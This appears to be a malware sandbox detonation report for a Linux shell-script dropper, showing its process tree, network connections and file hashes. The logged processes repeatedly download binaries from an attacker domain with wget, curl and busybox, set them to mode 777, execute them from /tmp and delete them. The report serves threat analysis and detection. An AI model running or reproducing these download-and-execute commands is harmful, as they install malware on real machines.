[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/rm

[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/chmod

[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23

[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/rm

[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/chmod

[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb

[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/rm

[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/chmod

[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE

[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/rm

[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/chmod

[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm

[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/rm

[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/chmod

[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO

[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/rm

[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/chmod

[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM

[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/rm

[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/chmod

[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY

[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/rm

[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/chmod

[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB

[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/rm

[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/chmod

[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi

[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/rm

[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/chmod

[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8

[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/rm

[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/chmod

[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF

[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/rm

[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/chmod

[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D

[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/bin/rm

[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/chmod

[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA

[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/bin/rm

[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/chmod

[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF

[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/bin/rm

[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/chmod

[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23

[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/bin/rm

[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/chmod

[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb

[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/bin/rm

[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/chmod

[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE

[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/bin/rm

[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/chmod

[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm

[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/bin/rm

[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/chmod

[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/bin/rm

[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/chmod

[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO

[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/bin/rm

[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/chmod

[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM

[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/bin/rm

[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/chmod

[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY

[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/bin/rm

[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/chmod

[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB

[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/bin/rm

[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/chmod

[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi

[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/bin/rm

[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/chmod

[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8

[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

/bin/rm

[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:07

Reported

2024-10-25 01:10

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

148s

Max time network

129s

Command Line

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh

[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]

/usr/bin/curl

